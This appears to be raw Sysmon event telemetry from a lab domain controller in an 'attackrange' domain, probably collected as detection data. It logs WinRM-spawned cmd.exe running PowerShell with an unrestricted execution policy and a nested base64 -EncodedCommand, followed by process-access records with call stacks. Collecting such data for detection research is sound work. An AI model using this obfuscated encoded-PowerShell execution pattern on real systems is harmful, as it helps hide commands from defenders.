EEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6440-6064-072B-120000000000}0x122b070HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6440-6064-D702-00000000AD01}2508C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.310{266CAFBE-6440-6064-D602-00000000AD01}12965004C:\Windows\system32\conhost.exe{266CAFBE-6440-6064-D702-00000000AD01}2508C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.310{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.310{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.310{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.310{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.310{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.310{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.310{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.310{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.310{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.310{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6440-6064-D702-00000000AD01}2508C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.310{266CAFBE-6440-6064-D502-00000000AD01}7961608C:\Windows\system32\WinrsHost.exe{266CAFBE-6440-6064-D702-00000000AD01}2508C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.320{266CAFBE-6440-6064-D702-00000000AD01}2508C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6440-6064-072B-120000000000}0x122b070HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-6440-6064-D502-00000000AD01}796C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.310{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM3